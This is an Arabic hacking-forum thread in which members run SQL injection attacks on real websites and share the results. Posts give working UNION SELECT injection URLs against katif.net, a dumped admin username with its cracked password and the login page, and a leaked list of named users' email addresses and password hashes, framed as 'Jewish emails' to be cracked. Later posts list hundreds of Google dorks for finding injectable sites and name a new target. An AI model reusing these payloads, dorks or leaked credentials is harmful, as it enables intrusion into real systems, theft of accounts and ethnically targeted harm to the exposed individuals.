:: vBspiders Professional Network :: - غرفة حقن قواعد البيانات {غرفة Sql }

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - غرفة حقن قواعد البيانات {غرفة Sql } (http://www.vbspiders.com/vb/t33334.html)

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 192214)

جاري المحاولة أخي مع الموقع + هل قمت بحقنه مسبقا يدويا أو فقط قكت بإكتشاف الموقع مصاب فقمت بوضعه ؟؟

نعم اخى تم حقنه مسبقا واستخراج اليوزر والباص

[align=center]تم الحقن...
هذا الباس :

كود PHP:

   http://www.new.katif.net/text.php?page=-228+union+select+1,2,password,4,5+from+users--

الباس المشفر : a73daea6d27e7ad59e28f6cc023f61ad
الباس بعد فك التشفير : talgan

يوزر الادمن :

كود PHP:

   http://www.new.katif.net/text.php?page=-228+union+select+1,2,username,4,5+from+users--

اليوزر : admin

لوحة الدخول : http://www.new.katif.net/login.php

بالتوفيق
تحياتي

[/align]

اقتباس:

المشاركة الأصلية كتبت بواسطة Master vbspiders (المشاركة 192250)

[align=center]تم الحقن...
هذا الباس :

كود PHP:

   http://www.new.katif.net/text.php?page=-228+union+select+1,2,password,4,5+from+users--

الباس المشفر : a73daea6d27e7ad59e28f6cc023f61ad
الباس بعد فك التشفير : talgan

يوزر الادمن :

كود PHP:

   http://www.new.katif.net/text.php?page=-228+union+select+1,2,username,4,5+from+users--

اليوزر : admin

لوحة الدخول : http://www.new.katif.net/login.php

بالتوفيق
تحياتي

[/align]

احسنت اخى

ياريت اخى دارك موقع فيه فلترة او فوربيدن نشتغل عليه شوية مع الاعضاء

منتظر الهدف الجديد

كود:

أخي العزيز 

أنا دخلت على الموقع اللي أنت حطيتو 

لكن دخلن على الترجمة الإنجليزية 

يعني الموقع الهدف 

لكن بالإنجليزية وطلعت نتائج غير اللي طلعها خويا master vbspiders

وهذا هو الناتج
 

//////////////////////////////////////////////////////////////////////

====================================================================

/////////////////////////////////////////////////////////////////////////

*******************************************************/

**b1gmail_prefs:pop3_pass:katif_main****

*******************************************************

b1gmail_prefs:id:katif_main

b1gmail_prefs:pop3_user:katif_main

b1gmail_prefs:pop3_pass:katif_main

--------------------------------------

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,pop3_user,0x3a,pop3_pass%29,5,6,7,8+from+b1gmail_prefs--

--------------------------------------
 

1:elhanan:talgan
 

*********************************************

**maillist_maillist:mailPassword:katif_main**

*********************************************
 

maillist_maillist:id:katif_main

maillist_maillist:name:katif_main

___________________________________________

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name%29,5,6,7,8+from+maillist_maillist--

_________________________________________________
 
 

***********************************************

***maillist_maillistuser:password:katif_main***

***********************************************
 

maillist_maillistuser:id:katif_main

maillist_maillistuser:name:katif_main

maillist_maillistuser:email:katif_main

maillist_maillistuser:password:katif_main
 

________________________________________________________

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name,0x3a,email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--

___________________________________________________________
 

1876090728:katif.net:mailing@katif.net:194e4b797be164ae

1689980789:Ã Ã¬Ã§Ã°Ã¯ Ã±Ã°Ã£Ã¸:elhanan@katif.net:194e4b797be164ae

249739970:elhanans:elhanans@walla.co.il:2e686acb5ca7c2bd

612492932:yael mann:yaelimani@walla.co.il:04db499a1ad2582c

601390310:golansha:golansha@hotmail.com:1881ba4f105b73dd

2002102671:judy kamm:judyk@usa.com:609aa7377ab87166

157338937:atucker:atucker@isdn.net.il:7170ce2f04a1be06

804252561:eliav664:eliav664@walla.com:176a45fc06fbceee

944182215:Ã©Ã¤Ã¥Ã£Ã¤ Ã¡Ã¸Ã°Ã©Ã¢Ã¸:yberniger@walla.co.il:525a34fa606b09b2

1279191856:y:aewz@walla.co.il:793225f547a317b6

1946549534:yy:aewz@walla.com:740ae2da5439e411

1848114356:Bentolila Shlomo:SH321@zahav.net.il:16e9f8c92a62d542 

1873024935:menucha chwat:menu@zahav.net.il:78334b646f3efd35

680028509:Ã¤Ã£Ã± Ã¥Ã Ã¥Ã¢Ã£Ã© Ã«Ã¤Ã¯:hadassc@bezeqint.net:7241591e0dfd4a2c

27004440:ala:alon@myquickmail.us:2f7bf62202815811

1555230481:shai biton:shaib11@gmail.com:6477aaca3a26de83

2007512475:daxy:hadaxy@yahoo.com:719aa9c20fc3d7ac

730880914:shimon333:olam@olam-jew.com:15c92b2
 
 
 
 

======================================================================================

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--

بالنسبة لهذا الأمر الأخير 

فحبيت أحطلكم فقط إستعلامين 

وهما الإيميل و الباس 

و أرجو من الإخوة المحترفين في فك الهاشات فك هاته الهاشات مع إرفاق فيديو إن أمكن أو على الأقل 

كتابة البرنامج المستعمل 

وهاته كلها إيميلات يهودية 

+

أنا خمنت لوحت التحكم لكن ما طلعت صحيحة

الله يعطيك العافية اخي ooooo_darkman_ooooo

يعني أنا و الأخ Master vbspiders
إصطدنا عصفورين بحجر واحد
وجاري صيد الثالث

اقتباس:

المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 192273)

كود:

أخي العزيز 

أنا دخلت على الموقع اللي أنت حطيتو 

لكن دخلن على الترجمة الإنجليزية 

يعني الموقع الهدف 

لكن بالإنجليزية وطلعت نتائج غير اللي طلعها خويا master vbspiders

وهذا هو الناتج
 

//////////////////////////////////////////////////////////////////////

====================================================================

/////////////////////////////////////////////////////////////////////////

*******************************************************/

**b1gmail_prefs:pop3_pass:katif_main****

*******************************************************

b1gmail_prefs:id:katif_main

b1gmail_prefs:pop3_user:katif_main

b1gmail_prefs:pop3_pass:katif_main

--------------------------------------

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,pop3_user,0x3a,pop3_pass%29,5,6,7,8+from+b1gmail_prefs--

--------------------------------------
 

1:elhanan:talgan
 

*********************************************

**maillist_maillist:mailPassword:katif_main**

*********************************************
 

maillist_maillist:id:katif_main

maillist_maillist:name:katif_main

___________________________________________

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name%29,5,6,7,8+from+maillist_maillist--

_________________________________________________
 
 

***********************************************

***maillist_maillistuser:password:katif_main***

***********************************************
 

maillist_maillistuser:id:katif_main

maillist_maillistuser:name:katif_main

maillist_maillistuser:email:katif_main

maillist_maillistuser:password:katif_main
 

________________________________________________________

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name,0x3a,email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--

___________________________________________________________
 

1876090728:katif.net:mailing@katif.net:194e4b797be164ae

1689980789:Ã Ã¬Ã§Ã°Ã¯ Ã±Ã°Ã£Ã¸:elhanan@katif.net:194e4b797be164ae

249739970:elhanans:elhanans@walla.co.il:2e686acb5ca7c2bd

612492932:yael mann:yaelimani@walla.co.il:04db499a1ad2582c

601390310:golansha:golansha@hotmail.com:1881ba4f105b73dd

2002102671:judy kamm:judyk@usa.com:609aa7377ab87166

157338937:atucker:atucker@isdn.net.il:7170ce2f04a1be06

804252561:eliav664:eliav664@walla.com:176a45fc06fbceee

944182215:Ã©Ã¤Ã¥Ã£Ã¤ Ã¡Ã¸Ã°Ã©Ã¢Ã¸:yberniger@walla.co.il:525a34fa606b09b2

1279191856:y:aewz@walla.co.il:793225f547a317b6

1946549534:yy:aewz@walla.com:740ae2da5439e411

1848114356:Bentolila Shlomo:SH321@zahav.net.il:16e9f8c92a62d542 

1873024935:menucha chwat:menu@zahav.net.il:78334b646f3efd35

680028509:Ã¤Ã£Ã± Ã¥Ã Ã¥Ã¢Ã£Ã© Ã«Ã¤Ã¯:hadassc@bezeqint.net:7241591e0dfd4a2c

27004440:ala:alon@myquickmail.us:2f7bf62202815811

1555230481:shai biton:shaib11@gmail.com:6477aaca3a26de83

2007512475:daxy:hadaxy@yahoo.com:719aa9c20fc3d7ac

730880914:shimon333:olam@olam-jew.com:15c92b2
 
 
 
 

======================================================================================

http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--

بالنسبة لهذا الأمر الأخير 

فحبيت أحطلكم فقط إستعلامين 

وهما الإيميل و الباس 

و أرجو من الإخوة المحترفين في فك الهاشات فك هاته الهاشات مع إرفاق فيديو إن أمكن أو على الأقل 

كتابة البرنامج المستعمل 

وهاته كلها إيميلات يهودية 

+

أنا خمنت لوحت التحكم لكن ما طلعت صحيحة

نعم اخى دارك ظهرت نتائج مختلفة للاختلاف قاعدة البيانات

[align=center]هههه الان جربت فعلا احول للغة الانجليزية
وفعلا فتح معي غير موقع هههه
بارك الله فيك اخي ooooo_darkman_ooooo
واصل
تحياتي لك
[/align]

[align=center]medoo_mohamed
شكرااا على الهدف
^_^
تحياتي[/align]

Master vbspiders
===============
الله يبارك فيك خويا
---------------------------------
medoo_mohamed
أعلم هذا أخي
ومازال هناك أخرى ( .....أشك أنها أكثر من ثلاثة قواعد )

New sql injection dork

[align=center]دوركات جديدة من نوعها...
بالتوفيق

كود PHP:

   inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:ogl_inet.php?ogl_id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:aboutbook.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:pages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

وهذه دوركات لشوبينغ

كود PHP:

   about.php?cartID=

accinfo.php?cartId=

acclogin.php?cartID=

add.php?bookid=

add_cart.php?num=

addcart.php?

addItem.php

add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=

cart_additem.php?id=

cart_validate.php?id=

cartadd.php?id=

cat.php?iCat=

catalog.php

catalog.php?CatalogID=

catalog_item.php?ID=

catalog_main.php?catid=

category.php

category.php?catid=

category_list.php?id=

categorydisplay.php?catid=

checkout.php?cartid=

checkout.php?UserID=

checkout_confirmed.php?order_id=

checkout1.php?cartid=

comersus_listCategoriesAndProducts.php?idCategory=

comersus_optEmailToFriendForm.php?idProduct=

comersus_optReviewReadExec.php?idProduct=

comersus_viewItem.php?idProduct=

comments_form.php?ID=

contact.php?cartId=

content.php?id=

customerService.php?TextID1=

default.php?catID=

description.php?bookid=

details.php?BookID=

details.php?Press_Release_ID=

details.php?Product_ID=

details.php?Service_ID=

display_item.php?id=

displayproducts.php

downloadTrial.php?intProdID=

emailproduct.php?itemid=

emailToFriend.php?idProduct=

events.php?ID=

faq.php?cartID=

faq_list.php?id=

faqs.php?id=

feedback.php?title=

freedownload.php?bookid=

fullDisplay.php?item=

getbook.php?bookid=

GetItems.php?itemid=

giftDetail.php?id=

help.php?CartId=

home.php?id=

index.php?cart=

index.php?cartID=

index.php?ID=

info.php?ID=

item.php?eid=

item.php?item_id=

item.php?itemid=

item.php?model=

item.php?prodtype=

item.php?shopcd=

item_details.php?catid=

item_list.php?maingroup

item_show.php?code_no=

itemDesc.php?CartId=

itemdetail.php?item=

itemdetails.php?catalogid=

learnmore.php?cartID=

links.php?catid=

list.php?bookid=

List.php?CatID=

listcategoriesandproducts.php?idCategory=

modline.php?id=

myaccount.php?catid=

news.php?id=

order.php?BookID=

order.php?id=

order.php?item_ID=

OrderForm.php?Cart=

page.php?PartID=

payment.php?CartID=

pdetail.php?item_id=

powersearch.php?CartId=

price.php

privacy.php?cartID=

prodbycat.php?intCatalogID=

prodetails.php?prodid=

prodlist.php?catid=

product.php?bookID=

product.php?intProdID=

product_info.php?item_id=

productDetails.php?idProduct=

productDisplay.php

productinfo.php?item=

productlist.php?ViewType=Category&CategoryID=

productpage.php

products.php?ID=

products.php?keyword=

products_category.php?CategoryID=

products_detail.php?CategoryID=

productsByCategory.php?intCatalogID=

prodView.php?idProduct=

promo.php?id=

promotion.php?catid=

pview.php?Item=

resellers.php?idCategory=

results.php?cat=

savecart.php?CartId=

search.php?CartID=

searchcat.php?search_id=

Select_Item.php?id=

Services.php?ID=

shippinginfo.php?CartId=

shop.php?a=

shop.php?action=

shop.php?bookid=

shop.php?cartID=

shop_details.php?prodid=

shopaddtocart.php

shopaddtocart.php?catalogid=

shopbasket.php?bookid=

shopbycategory.php?catid=

shopcart.php?title=

shopcreatorder.php

shopcurrency.php?cid=

shopdc.php?bookid=

shopdisplaycategories.php

shopdisplayproduct.php?catalogid=

shopdisplayproducts.php

shopexd.php

shopexd.php?catalogid=

shopping_basket.php?cartID=

shopprojectlogin.php

shopquery.php?catalogid=

shopremoveitem.php?cartid=

shopreviewadd.php?id=

shopreviewlist.php?id=

ShopSearch.php?CategoryID=

shoptellafriend.php?id=

shopthanks.php

shopwelcome.php?title=

show_item.php?id=

show_item_details.php?item_id=

showbook.php?bookid=

showStore.php?catID=

shprodde.php?SKU=

specials.php?id=

store.php?id=

store_bycat.php?id=

store_listing.php?id=

Store_ViewProducts.php?Cat=

store-details.php?id=

storefront.php?id=

storefronts.php?title=

storeitem.php?item=

StoreRedirect.php?ID=

subcategories.php?id=

tek9.php?

template.php?Action=Item&pid=

topic.php?ID=

tuangou.php?bookid=

type.php?iType=

updatebasket.php?bookid=

updates.php?ID=

view.php?cid=

view_cart.php?title=

view_detail.php?ID=

viewcart.php?CartId=

viewCart.php?userID=

viewCat_h.php?idCategory=

viewevent.php?EventID=

viewitem.php?recor=

viewPrd.php?idcategory=

ViewProduct.php?misc=

voteList.php?item_ID=

whatsnew.php?idCategory=

WsAncillary.php?ID=

WsPages.php?ID=

نريد هدف جديد عن طريق هالدوركات
^_*
تحياتي

[/align]

Master vbspiders
شكرا أخي
الكريم

الهدف الجديد

http://www.adas-fusion.eu

هناك اربع قواعد بيانات لهذا الموقع اعتقد موقع استضافة

جاري بإذن الله